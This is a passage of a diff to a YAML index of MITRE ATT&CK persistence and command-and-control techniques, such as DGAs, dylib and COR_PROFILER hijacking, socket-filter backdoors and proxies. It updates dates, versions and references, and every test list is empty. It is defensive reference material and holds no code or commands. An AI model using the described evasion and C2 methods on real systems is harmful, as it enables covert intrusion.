+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36014,7 +36446,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36038,12 +36470,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36127,11 +36557,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36183,9 +36612,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36234,7 +36662,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36272,14 +36700,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36342,7 +36768,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36400,97 +36825,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -36556,9 +36979,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -36604,7 +37085,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -36636,7 +37116,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36658,22 +37138,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -36695,7 +37173,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -36720,7 +37198,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -36804,7 +37281,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -36868,11 +37344,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36956,7 +37431,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -36987,7 +37461,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37007,8 +37481,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37030,8 +37504,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37093,7 +37565,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37141,7 +37612,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37195,7 +37665,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37228,7 +37697,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37248,8 +37717,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37287,7 +37754,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37315,42 +37782,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37359,17 +37806,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
